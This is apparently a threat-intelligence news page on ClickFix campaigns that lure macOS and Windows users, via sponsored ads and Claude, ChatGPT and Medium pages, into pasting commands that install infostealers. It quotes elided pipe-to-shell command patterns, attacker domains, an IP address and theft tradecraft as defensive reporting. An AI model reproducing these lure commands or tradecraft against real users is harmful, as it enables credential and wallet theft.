ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a ClickFix-style social-engineering campaign that abuses Google sponsored search results to funnel macOS users to malicious content hosted on legitimate platforms, including Anthropic Claude public artifacts (claude.ai) and Medium pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., echo "..." | base64 -D | zsh or curl ... | zsh). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated ~12,300 to 15,600 views, indicating significant exposure (reported as 10,000+ and 15,000+ potential victims across coverage).
The payloads deliver macOS information-stealing malware, including MacSync, which collects data such as Keychain credentials, browser data, and cryptocurrency wallet files. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into /tmp/osalogging.zip, and exfiltrating via HTTP POST to attacker infrastructure (e.g., a2abotnet[.]com/gate, with C2 paths like a2abotnet[.]com/dynamic). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
Related Entities
Malware
Affected Products
Sources
Related Stories
ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
Today
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
3 weeks ago
Malicious Google Search Ads and Forged Apple Pages Trick macOS Users Into Running Terminal Commands
Security researchers reported an active macOS social-engineering campaign that abuses **Google Search sponsored results** and Google-hosted content (notably `docs.google.com`, and also `business.google.com`) to funnel users to **forged Apple Support-like pages** and other lookalike content (including Medium posts). The pages instruct victims—often searching for “mac cleaner” tools or macOS maintenance tasks like clearing cache—to copy/paste an **obfuscated Base64** command into **Terminal**, which then downloads and executes a follow-on script with the user’s permissions. Once executed, the payload can enable remote access and data theft, including harvesting sensitive files and **SSH keys**, and may also deploy additional malware or cryptomining. One report ties the activity to delivery of the **AMOS (aka SOMA) stealer**, which was observed creating artifacts such as `.agent` (AppleScript used to run theft), `.mainHelper` (Mach-O binary), and `.pass` (password stored in plaintext), and attempting to access user data including **Documents** and **Notes**. Researchers also noted the apparent use of **compromised, Google-verified advertiser accounts** to place the malicious ads, helping the campaign bypass ad-platform trust checks.
1 months ago